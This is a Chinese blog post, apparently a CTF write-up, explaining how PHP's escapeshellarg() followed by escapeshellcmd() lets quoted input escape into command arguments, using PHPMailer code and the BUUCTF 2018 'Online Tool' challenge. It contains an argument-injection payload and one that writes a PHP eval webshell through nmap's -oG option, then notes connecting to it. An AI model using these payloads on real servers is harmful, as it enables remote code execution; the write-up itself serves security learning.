<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-noah.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-noah.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-noah.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"flat"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"buttons","active":"valine","storage":true,"lazyload":false,"nav":null,"activeClass":"valine"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":true},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="php中的escapeshellarg+escapeshellcmd漏洞0x01 escapeshellarg()与escapecmd()escapeshellarg()与escapecmd()是php预置的用于防范命令注入攻击的函数，官方文档中给出的用法如下：  escapeshellcmd (PHP 4, PHP 5, PHP 7, PHP 8)escapeshellcmd — shell 元">
<meta property="og:type" content="article">
<meta property="og:title" content="php中的escapeshellarg+escapeshellcmd漏洞">
<meta property="og:url" content="http://example.com/2021/04/27/escapeshell&escapecmd%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="NoahBox">
<meta property="og:description" content="php中的escapeshellarg+escapeshellcmd漏洞0x01 escapeshellarg()与escapecmd()escapeshellarg()与escapecmd()是php预置的用于防范命令注入攻击的函数，官方文档中给出的用法如下：  escapeshellcmd (PHP 4, PHP 5, PHP 7, PHP 8)escapeshellcmd — shell 元">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/04/27/YEziXVo6DFwdZBC.png">
<meta property="og:image" content="https://i.loli.net/2021/04/27/ZhHwjGQtubs56CR.png">
<meta property="og:image" content="https://i.loli.net/2021/04/27/2y3QmOZP4JDNiUn.png">
<meta property="og:image" content="https://i.loli.net/2021/04/27/KMftYhTGOwb8kdv.png">
<meta property="article:published_time" content="2021-04-27T14:34:00.000Z">
<meta property="article:modified_time" content="2021-04-27T14:46:51.633Z">
<meta property="article:author" content="NoahTie">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="buuctf">
<meta property="article:tag" content="WEB">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/04/27/YEziXVo6DFwdZBC.png">

<link rel="canonical" href="http://example.com/2021/04/27/escapeshell&escapecmd%E6%BC%8F%E6%B4%9E/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>php中的escapeshellarg+escapeshellcmd漏洞 | NoahBox</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="NoahBox" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">NoahBox</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Hell is Other People.</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-guestbook">

    <a href="/guestbook/" rel="section"><i class="fa fa-book fa-fw"></i>留言簿</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/04/27/escapeshell&escapecmd%E6%BC%8F%E6%B4%9E/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="NoahTie">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="NoahBox">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          php中的escapeshellarg+escapeshellcmd漏洞
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-04-27 22:34:00 / 修改时间：22:46:51" itemprop="dateCreated datePublished" datetime="2021-04-27T22:34:00+08:00">2021-04-27</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
            </span>

          
            <span id="/2021/04/27/escapeshell&escapecmd%E6%BC%8F%E6%B4%9E/" class="post-meta-item leancloud_visitors" data-flag-title="php中的escapeshellarg+escapeshellcmd漏洞" title="阅读次数">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span class="leancloud-visitors-count"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2021/04/27/escapeshell&escapecmd%E6%BC%8F%E6%B4%9E/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2021/04/27/escapeshell&escapecmd%E6%BC%8F%E6%B4%9E/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="php中的escapeshellarg-escapeshellcmd漏洞"><a href="#php中的escapeshellarg-escapeshellcmd漏洞" class="headerlink" title="php中的escapeshellarg+escapeshellcmd漏洞"></a>php中的escapeshellarg+escapeshellcmd漏洞</h1><h2 id="0x01-escapeshellarg-与escapecmd"><a href="#0x01-escapeshellarg-与escapecmd" class="headerlink" title="0x01 escapeshellarg()与escapecmd()"></a>0x01 <code>escapeshellarg()</code>与<code>escapecmd()</code></h2><p><code>escapeshellarg()</code>与<code>escapecmd()</code>是php预置的用于防范命令注入攻击的函数，官方文档中给出的用法如下：</p>
<hr>
<h3 id="escapeshellcmd"><a href="#escapeshellcmd" class="headerlink" title="escapeshellcmd"></a>escapeshellcmd</h3><blockquote>
<p><em>(PHP 4, PHP 5, PHP 7, PHP 8)</em><br>escapeshellcmd — shell 元字符转义</p>
<h4 id="说明"><a href="#说明" class="headerlink" title="说明"></a>说明</h4><p><strong>escapeshellcmd</strong>    ( string <code>$command</code>   ) : string<br><strong>escapeshellcmd()</strong> 对字符串中可能会欺骗shell命令执行任意命令的字符进行转义。此函数保证用户输入的数据在传送到 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.exec.php">exec()</a> 或<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.system.php">system()</a> 函数，或者 <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.operators.execution.php">执行操作符</a> 之前进行转义。  </p>
<p>反斜线（\）会在以下字符之前插入：   &amp;#;`|*?~&lt;&gt;^()[]{}$\, <code>\x0A</code>   和 <code>\xFF</code>。 <code>&#39;</code> 和 <code>&quot;</code> 仅在不配对的时候被转义。   在 Windows 平台上，所有这些字符以及 <code>%</code> 和 <code>!</code> 字符都会被空格代替。  </p>
<a id="more"></a>

<h4 id="参数"><a href="#参数" class="headerlink" title="参数"></a>参数</h4><p><code>command</code>: 要转义的命令。           </p>
<h4 id="返回值"><a href="#返回值" class="headerlink" title="返回值"></a>返回值</h4><p>转义后的字符串。  </p>
</blockquote>
<hr>
<h3 id="escapeshellarg"><a href="#escapeshellarg" class="headerlink" title="escapeshellarg"></a>escapeshellarg</h3><blockquote>
<p><em>(PHP 4 &gt;= 4.0.3, PHP 5, PHP 7, PHP 8)</em><br>escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数</p>
<h4 id="说明-1"><a href="#说明-1" class="headerlink" title="说明"></a>说明</h4><p><strong>escapeshellarg</strong>    ( string <code>$arg</code>   ) : string<br><strong>escapeshellarg()</strong> 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号，这样以确保能够直接将一个字符串传入 shell 函数，并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含  <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.exec.php">exec()</a>, <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.system.php">system()</a>    <a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.operators.execution.php">执行运算符</a> 。  </p>
<h4 id="参数-1"><a href="#参数-1" class="headerlink" title="参数"></a>参数</h4><p><code>arg</code>: 需要被转码的参数。           </p>
<h4 id="返回值-1"><a href="#返回值-1" class="headerlink" title="返回值"></a>返回值</h4><p>转换之后字符串。  </p>
</blockquote>
<hr>
<h3 id="示例"><a href="#示例" class="headerlink" title="示例"></a>示例</h3><p><img src="https://i.loli.net/2021/04/27/YEziXVo6DFwdZBC.png" alt="image-20210427175517136"></p>
<ul>
<li><p><code>escapeshellarg()</code>将字符串以特殊符号为分割进行拆分，并在拆分后的字符串首尾加上单引号，在单独的符号前加上了反斜线。</p>
<p>通过另外一例可以更明显地看出来这一点：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">php &gt; <span class="keyword">echo</span> escapeshellarg(<span class="string">&quot;Hanshu said:&#x27;i&#x27;m god!&#x27;&quot;</span>);</span><br><span class="line"><span class="string">&#x27;Hanshu said:&#x27;</span>\<span class="string">&#x27;&#x27;</span>i<span class="string">&#x27;\&#x27;&#x27;</span>m god!<span class="string">&#x27;\&#x27;&#x27;</span><span class="string">&#x27;</span></span><br></pre></td></tr></table></figure>

<p>经过这一步处理之后的字符串可以在终端中“安全”地输出：</p>
<p><img src="https://i.loli.net/2021/04/27/ZhHwjGQtubs56CR.png" alt="image-20210427180547821"></p>
</li>
</ul>
<ul>
<li><code>escapeshellcmd()</code>为字符串中的特殊符号前添加反斜线。</li>
</ul>
<h2 id="0x02-漏洞"><a href="#0x02-漏洞" class="headerlink" title="0x02 漏洞"></a>0x02 漏洞</h2><h3 id="一个PHPMailer中的漏洞的简易分析"><a href="#一个PHPMailer中的漏洞的简易分析" class="headerlink" title="一个PHPMailer中的漏洞的简易分析"></a>一个PHPMailer中的漏洞的简易分析</h3><p>关于这两个函数的漏洞，在网上可以找到的最早的出处是PHPMailer的官方为了修复5.2.18前版本中出现的RCE漏洞而引入的新漏洞。</p>
<p>PHPMailer源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">mailSend</span>(<span class="params">$header, $body</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $toArr = <span class="keyword">array</span>();</span><br><span class="line">    <span class="keyword">foreach</span> (<span class="keyword">$this</span>-&gt;to <span class="keyword">as</span> $toaddr) &#123;</span><br><span class="line">        $toArr[] = <span class="keyword">$this</span>-&gt;addrFormat($toaddr);</span><br><span class="line">    &#125;</span><br><span class="line">    $to = implode(<span class="string">&#x27;, &#x27;</span>, $toArr);</span><br><span class="line">    </span><br><span class="line">    $param = <span class="literal">null</span>;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;Sender) <span class="keyword">and</span> <span class="keyword">$this</span>-&gt;validateAddress(<span class="keyword">$this</span>-&gt;Sender)) &#123;</span><br><span class="line">        $param = sprintf(<span class="string">&#x27;-f%s&#x27;</span>, escapeshellarg(<span class="keyword">$this</span>-&gt;Sender));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;Sender) <span class="keyword">and</span> !ini_get(<span class="string">&#x27;safe_mode&#x27;</span>) <span class="keyword">and</span> <span class="keyword">$this</span>-&gt;validateAddress(<span class="keyword">$this</span>-&gt;Sender)) &#123;</span><br><span class="line">        $old_from = ini_get(<span class="string">&#x27;sendmil_from&#x27;</span>);</span><br><span class="line">        ini_set(<span class="string">&#x27;sendmail_from&#x27;</span>, <span class="keyword">$this</span>-&gt;Sender);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">/* and more */</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>php_mail的源代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (force_extra_parameters) &#123;</span><br><span class="line">    extra_cmd = php_escape_shell_cmd(force_extra_parameters);</span><br><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (extra_cmd) &#123;</span><br><span class="line">    extra_cmd = php_escape_shell_cmd(extra_cmd);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (php_mail(to_r, subject_r, message, headers_trimmed, extra_cmd TSRMLS_CC)) &#123;</span><br><span class="line">    RETVAL_TRUE;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    RETVAL_FALSE;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以注意到PHPMailer的源代码中第11行使用了<code>escapeshellarg()</code>，而在源码调用的php方法的源码的第3行中，又调用了<code>phpescapeshellcmd()</code>。</p>
<p>正是这两个函数的连续调用造成了漏洞。</p>
<p>将这个流程进行简化，大致就是：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	$payload = <span class="string">&quot;127.0.0.1&#x27; -o 1.php&quot;</span>;</span><br><span class="line">    $cmd = escapeshellcmd(escapeshellarg($payload));</span><br><span class="line">	<span class="keyword">echo</span> $cmd;</span><br><span class="line">	system(<span class="string">&quot;curl &quot;</span> . $cmd);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这里模拟了调用curl来获取文本页面回显，但是这里的payload导致原本应该回显在页面上的文本被保存为文件<code>1.php</code>。</p>
<p><img src="https://i.loli.net/2021/04/27/2y3QmOZP4JDNiUn.png" alt="image-20210427212505557"></p>
<p>可以发现进行过处理之后，payload变成了<code>&#39;127.0.0.1&#39;\\&#39;&#39; -o 1.php\&#39;</code>。在这个payload传入系统后发生了这些事情：</p>
<ul>
<li><code>&#39;127.0.0.1&#39;</code>当作引号包裹起来的字符串传入指令，相当于<code>127.0.0.1</code>。</li>
<li><code>\\</code>被转义为单独的反斜杠，被当作网址后的路径分隔符。</li>
<li><code>&#39;&#39;</code>成对的单引号被shell忽略。</li>
<li><code>-o 1.php</code>被当作传入的参数，即原本在单引号中的字符串的一部分逃逸了引号，变成了参数。</li>
<li><code> \&#39;</code>反斜杠转义的单引号。</li>
</ul>
<h3 id="漏洞的局限性及应对方法"><a href="#漏洞的局限性及应对方法" class="headerlink" title="漏洞的局限性及应对方法"></a>漏洞的局限性及应对方法</h3><p>如上例，最终保存的文件名将会是<code>1.php&#39;</code>，而并非我们期望的<code>1.php</code>。在许多指令中，只需要在<code>1.php</code>与<code>&#39;</code>之间添加一个空格即可。这时，引号将被当作单独的参数使用。</p>
<h2 id="0x03-来看例题吧"><a href="#0x03-来看例题吧" class="headerlink" title="0x03 来看例题吧"></a>0x03 来看例题吧</h2><h3 id="题目地址"><a href="#题目地址" class="headerlink" title="题目地址"></a>题目地址</h3><p>[<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#[BUUCTF_2018\]Online_Tool](https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool)">https://buuoj.cn/challenges#[BUUCTF_2018\]Online_Tool](https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool)</a></p>
<h3 id="题目源码"><a href="#题目源码" class="headerlink" title="题目源码"></a>题目源码</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_SERVER[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>])) &#123;</span><br><span class="line">    $_SERVER[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>] = $_SERVER[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">&#x27;host&#x27;</span>])) &#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    $host = $_GET[<span class="string">&#x27;host&#x27;</span>];</span><br><span class="line">    $host = escapeshellarg($host);</span><br><span class="line">    $host = escapeshellcmd($host);</span><br><span class="line">    $sandbox = md5(<span class="string">&quot;glzjin&quot;</span>. $_SERVER[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>]);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;you are in sandbox &#x27;</span>.$sandbox;</span><br><span class="line">    @mkdir($sandbox);</span><br><span class="line">    chdir($sandbox);</span><br><span class="line">    <span class="keyword">echo</span> system(<span class="string">&quot;nmap -T5 -sT -Pn --host-timeout 2 -F &quot;</span>.$host);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h3><p>3-5行、13-16行创建了一个目录，nmap指令将在这个目录下运行。</p>
<p>10-12行是漏洞产生的位置，和PHPMailer中漏洞产生的原理相同，我们只需要想办法让指令输出文件到目录下就行。</p>
<p>因为转义的缘故，shell的<code>&gt;</code>无法使用，但nmap有输出到文件的命令行参数<code>-oG</code>，构造payload：<code>&#39; &lt;?php eval($_POST[noah]);?&gt; -oG 1.php &#39; </code></p>
<p><img src="https://i.loli.net/2021/04/27/KMftYhTGOwb8kdv.png" alt="image-20210427222444764"></p>
<p>需要注意由于文件末尾还有其它信息，所以要加上末尾的<code>?&gt;</code>php标签。</p>
<p>上传payload之后用蚁剑之类的工具连接webshell。</p>

    </div>

    
    
    
      <div>
      
        <div>
    
        <div style="text-align:center;color: #66ccff;font-size:14px;">-EOF-</div>
    
</div>
      
      </div>
      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/buuctf/" rel="tag"># buuctf</a>
              <a href="/tags/WEB/" rel="tag"># WEB</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/04/27/DC-03/" rel="prev" title="Walkthrough for DC-03">
      <i class="fa fa-chevron-left"></i> Walkthrough for DC-03
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/05/17/%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83/" rel="next" title="无参数函数RCE - [GXYCTF2019]禁止套娃">
      无参数函数RCE - [GXYCTF2019]禁止套娃 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#php%E4%B8%AD%E7%9A%84escapeshellarg-escapeshellcmd%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.</span> <span class="nav-text">php中的escapeshellarg+escapeshellcmd漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-escapeshellarg-%E4%B8%8Eescapecmd"><span class="nav-number">1.1.</span> <span class="nav-text">0x01 escapeshellarg()与escapecmd()</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#escapeshellcmd"><span class="nav-number">1.1.1.</span> <span class="nav-text">escapeshellcmd</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%AF%B4%E6%98%8E"><span class="nav-number">1.1.1.1.</span> <span class="nav-text">说明</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%82%E6%95%B0"><span class="nav-number">1.1.1.2.</span> <span class="nav-text">参数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%BF%94%E5%9B%9E%E5%80%BC"><span class="nav-number">1.1.1.3.</span> <span class="nav-text">返回值</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#escapeshellarg"><span class="nav-number">1.1.2.</span> <span class="nav-text">escapeshellarg</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%AF%B4%E6%98%8E-1"><span class="nav-number">1.1.2.1.</span> <span class="nav-text">说明</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%82%E6%95%B0-1"><span class="nav-number">1.1.2.2.</span> <span class="nav-text">参数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%BF%94%E5%9B%9E%E5%80%BC-1"><span class="nav-number">1.1.2.3.</span> <span class="nav-text">返回值</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%A4%BA%E4%BE%8B"><span class="nav-number">1.1.3.</span> <span class="nav-text">示例</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.2.</span> <span class="nav-text">0x02 漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%80%E4%B8%AAPHPMailer%E4%B8%AD%E7%9A%84%E6%BC%8F%E6%B4%9E%E7%9A%84%E7%AE%80%E6%98%93%E5%88%86%E6%9E%90"><span class="nav-number">1.2.1.</span> <span class="nav-text">一个PHPMailer中的漏洞的简易分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%B1%80%E9%99%90%E6%80%A7%E5%8F%8A%E5%BA%94%E5%AF%B9%E6%96%B9%E6%B3%95"><span class="nav-number">1.2.2.</span> <span class="nav-text">漏洞的局限性及应对方法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-%E6%9D%A5%E7%9C%8B%E4%BE%8B%E9%A2%98%E5%90%A7"><span class="nav-number">1.3.</span> <span class="nav-text">0x03 来看例题吧</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE%E5%9C%B0%E5%9D%80"><span class="nav-number">1.3.1.</span> <span class="nav-text">题目地址</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE%E6%BA%90%E7%A0%81"><span class="nav-number">1.3.2.</span> <span class="nav-text">题目源码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="nav-number">1.3.3.</span> <span class="nav-text">解题思路</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="NoahTie"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">NoahTie</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/noahtie" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;noahtie" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
